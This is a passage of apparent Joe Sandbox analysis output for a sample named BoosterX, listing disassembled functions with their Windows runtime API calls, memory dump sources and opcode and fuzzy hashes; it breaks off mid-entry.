                                                    • Instruction ID: 17c431d6a22654abd66f4d7c6f1708c41ed1e910371629c891496cbb430238e4
                                                    • Opcode Fuzzy Hash: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction Fuzzy Hash: 1EE0EC40E1950B35FD182E6118691B500500F587B2F681BF3DFBDC83D7AF1CA5628118
                                                    Function 00007FF6C038D88C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                    • Instruction ID: 1ce3be04a738200bd6cf19a92b1fc6ad28e8c6364dd5c8621f305915693cc6c9
                                                    • Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                    • Instruction Fuzzy Hash: 58E0EC50E09643A6FF5AAFF2A8451B813D19F94B57F084177C98DC7391EF2CA4868600
                                                    Function 00007FF6C03533E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 00581cda7c60666db16e18db7aade68d96d0221c5bdb1fc775c713f5809bd176
                                                    • Instruction ID: 7a200e8fbd88cd2cf995d1692166fae08b190655f2998eea0775a3959f5239f9
                                                    • Opcode Fuzzy Hash: 00581cda7c60666db16e18db7aade68d96d0221c5bdb1fc775c713f5809bd176
                                                    • Instruction Fuzzy Hash: 82D1B46AB0C68B76EB288F2595802B977A1FB45B86F040435DF9DCB7B1CF38E4658700
                                                    Function 00007FF6C037CA50 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: bb382b1398f5ed301b51dcc9be6bbe705c3f4ace3879a963b5b237ae590ad562
                                                    • Instruction ID: d5120e4f8e649da19d93df482b8a9cda2a155c85151459f2b279b00338297252
                                                    • Opcode Fuzzy Hash: bb382b1398f5ed301b51dcc9be6bbe705c3f4ace3879a963b5b237ae590ad562
                                                    • Instruction Fuzzy Hash: 57917062F24A13E8FB10CF68D9851AC2771AB40769F55063ADE9DD2BD9DF38D586C300
                                                    Function 00007FF6C03717F0 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C036E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF6C036E8F0
                                                      • Part of subcall function 00007FF6C036E8C4: CloseHandle.KERNELBASE ref: 00007FF6C036E90F
                                                      • Part of subcall function 00007FF6C036E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF6C036E926
                                                      • Part of subcall function 00007FF6C036E8C4: CloseHandle.KERNEL32 ref: 00007FF6C036E933
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0371A4B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 904680172-0
                                                    • Opcode ID: a30e5f59f21d382daf2aa534973ebb390bb07a415331e4e742966db39958626a
                                                    • Instruction ID: d2a9848577b737e5432a771c0a4f7ab4d8f89c285a176758078cef94c22963c1
                                                    • Opcode Fuzzy Hash: a30e5f59f21d382daf2aa534973ebb390bb07a415331e4e742966db39958626a
                                                    • Instruction Fuzzy Hash: 66618E63B15A86B2EE08DF69D6940BC7365FB41F91B544232DBADC7BC2CF28E5618304
                                                    Function 00007FF6C035ECAC Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 03611529b89fbcd6f417b6da4cd687b86cf868a6bbb853273952e866da9f3ba1
                                                    • Instruction ID: 35cd26b3528020b8cb5e54519d46ce747f5bd180364076ab6c6ff4d092095774
                                                    • Opcode Fuzzy Hash: 03611529b89fbcd6f417b6da4cd687b86cf868a6bbb853273952e866da9f3ba1
                                                    • Instruction Fuzzy Hash: 5A51BE66A0C68361EA189F25E4493A92761FB86BD6F540136EECDC73E2CF3DE4858300
                                                    Function 00007FF6C035E7B8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C0363E88: FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035E9A3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1011579015-0
                                                    • Opcode ID: 9e468f688a81c359972c1e635341c92bb124f052ba55343c2094050d5c517733
                                                    • Instruction ID: f40c339de8cde2b17c398b612eca1a8d521be1156536c4527e9ec688ecd4e577
                                                    • Opcode Fuzzy Hash: 9e468f688a81c359972c1e635341c92bb124f052ba55343c2094050d5c517733
                                                    • Instruction Fuzzy Hash: 57516A26A0CA87A1FA648F29D4453A93361FB85B85F540236EACDC77F6DF2CE4418714
                                                    Function 00007FF6C036174C Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 3b8f437387dd1d4006b3f02e2e1b944d07b0b9290f566582f8b0ac23e0e9883b
                                                    • Instruction ID: df22effc20c3f63b5ee1533ff2034ab0a386b495f12a307f10dde4d56fea195e
                                                    • Opcode Fuzzy Hash: 3b8f437387dd1d4006b3f02e2e1b944d07b0b9290f566582f8b0ac23e0e9883b
                                                    • Instruction Fuzzy Hash: 4F41D562B18A9651EA149E17E944379A2A1FB44FC1F488536EF8CC7F4ADF3CD4518300
                                                    Function 00007FF6C038BD78 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                    • String ID:
                                                    • API String ID: 3947729631-0
                                                    • Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                    • Instruction ID: 5fc96bb8b27aa4d1d0b6237240f4fd57705d95c8c40664ac1291386a9432cbb7
                                                    • Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                    • Instruction Fuzzy Hash: DA41BF21E19A03A6FB249F11A8502782761AF90B86F94457BDA8DC77D2CF3DF844CB40
                                                    Function 00007FF6C035129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 680105476-0
                                                    • Opcode ID: 94b01ba5859182e293f6773a60cabc646bafe9d6d8f66b1fcd49a87c24f4ac40
                                                    • Instruction ID: e616f23315714c960c4e871a05d33ea91841ca17286c2bde20ce1b72ce3793c0
                                                    • Opcode Fuzzy Hash: 94b01ba5859182e293f6773a60cabc646bafe9d6d8f66b1fcd49a87c24f4ac40
                                                    • Instruction Fuzzy Hash: 67218E2AA08652A5EA149E92E4102797250EB05FF1F680B31DFBDCBBE5DF7CE4518344
                                                    Function 00007FF6C03911CC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction ID: 2051b89e2bd8688208d4d42cc77b697a183c12867610e3eedcbbf1315b484b91
                                                    • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction Fuzzy Hash: 0111492291C787A6E720AF50A48063963A4FB40B86F550936EACDD7796DF2CE8008700
                                                    Function 00007FF6C0353AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction ID: d7bee4e73c0a6d53141b52486a60702834cf9988b25caaa42e403b0256b6f959
                                                    • Opcode Fuzzy Hash: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction Fuzzy Hash: AB01C4A6E1C68751EA149F28E4452697361FF897A1F505332EBDCCBBA5EF2CD1408704
                                                    Function 00007FF6C03814D8 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C0381584: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815AB
                                                    • DloadProtectSection.DELAYIMP ref: 00007FF6C0381549
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DloadHandleModuleProtectSection
                                                    • String ID:
                                                    • API String ID: 2883838935-0
                                                    • Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction ID: c1ab4ceaeec2542ccafda12c3375e9ffca3f3a66414510e60bdb1540473bc741
                                                    • Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction Fuzzy Hash: C411C961E08A07A1FB619F16E8413B02254AF86B4EF180577CDCEC63A5EF3CA595C610
                                                    Function 00007FF6C0363E88 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C036407C: FindFirstFileW.KERNELBASE ref: 00007FF6C03640CB
                                                      • Part of subcall function 00007FF6C036407C: FindFirstFileW.KERNELBASE ref: 00007FF6C036411E
                                                      • Part of subcall function 00007FF6C036407C: GetLastError.KERNEL32 ref: 00007FF6C036416F
                                                    • FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                    • Instruction ID: b15a649c0bb25a0f584eedf9f70ade41b5e537adbc68693dcd3953897fa6f526
                                                    • Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                    • Instruction Fuzzy Hash: CFF0C26290C283A5EB509F75A5052792760BF0ABB5F280334DABDCB3DBCF2AD494C750
                                                    Function 00007FF6C03626FC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                    • Instruction ID: e1474437c83fe24f3737199bfaa5efadf5416de8c03f7fc8c7a27f603ce15c14
                                                    • Opcode Fuzzy Hash: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                    • Instruction Fuzzy Hash: 61E0C212B2095692FF20AF3AC841AB91320FF8DF86B491030CF8CC7322CF28C4998604
                                                    Function 00007FF6C0362450 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                    • Instruction ID: bcb757e8393bb79bca28feb98e58f7a24e43dbb98d80bdebbe3904f9e6059167
                                                    • Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                    • Instruction Fuzzy Hash: 17D0C916909842A2D9109B3A985207C1250AF92736FA40720D6BEC17E1CF1D949A9214
                                                    Function 00007FF6C0397590 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 209a15bdd53c5b123fa0d84f3a862c9be3360db7efcf8b869f54dd918b7cc07f
                                                    • Instruction ID: de8a8881564bc8da40feae8e5ac904ab759736a92241289a1cd695beeb82ec44
                                                    • Opcode Fuzzy Hash: 209a15bdd53c5b123fa0d84f3a862c9be3360db7efcf8b869f54dd918b7cc07f
                                                    • Instruction Fuzzy Hash: 21D09E99D1AD07A5FB05DF01E89D7302260FF5871BF521634C48DC53518F7C22958B40
                                                    Function 00007FF6C0367F84 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
